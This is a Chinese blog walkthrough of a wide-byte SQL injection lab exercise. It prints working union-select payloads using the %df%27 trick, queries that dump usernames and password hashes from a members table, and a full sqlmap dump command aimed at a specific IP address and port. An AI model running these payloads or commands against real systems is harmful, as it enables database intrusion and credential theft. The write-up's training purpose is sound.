SQL注入漏洞测试(宽字节)

漏洞复现

手工注入

在这里插入图片描述
原理:就是用%df去吃掉转义字符 / ,然后就可以正常注入了

思路:还是一样找注入点,过一下,就是找页面源码找注入点,然后什么get啊post什么xff什么的都试试,最后是宽字节的,所以按照题设就是在可能出现注入的页面加上 %df%27(%27 就是 ’)

然后会发现报错,然后开始一步步注入咯

然后就%df%27咯,发现注入点
在这里插入图片描述
后面都要进行url编码
order by 从1开始试(order by 1 --+),直到6发现错误

在这里插入图片描述

然后就是用union去找显示的点(union select 1,2,3,4,5 --+),发现3,5是显示的点,别忘了把id=1 换成-1(union 会把结果拼拼到一起,所有要让 union 前面的查询返回一个空值,一般采用类似于 id=-1 的方式。)

在这里插入图片描述

然后就是找版本和数据库了嘛

union select 1,2,version(),4,database()--+

在这里插入图片描述

数据库名这些要用Ascll编码,这里可以使用brup的decoder模块

union 1,2,version(),4,(select group_concat(table_name) from information_schema.tables where table_schema =0x6d6f7a68655f64697363757a5f73746f726d67726f7570)--+

在这里插入图片描述
在这里插入图片描述

接下来爆表字段
这里stormgroup_member表比较像我们要用的表
在这里插入图片描述
在这里插入图片描述

最后是看数据

 union select 1,2,(select group_concat(password) from stormgroup_member),4,(select group_concat(name) from stormgroup_member)--+

在这里插入图片描述

进行md5解密,找到第二个账号可获得key
在这里插入图片描述

sqlmap注入

1后面记得添加%df%27,并且不用用–batch参数,自己手动选择
在这里插入图片描述
在这里插入图片描述

sqlmap -u "124.70.71.251:42544/new_list.php?id=1%df%27" --dbs -D mozhe_discuz_stormgroup --tables -T stormgroup_member --columns -C name,password --dump

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值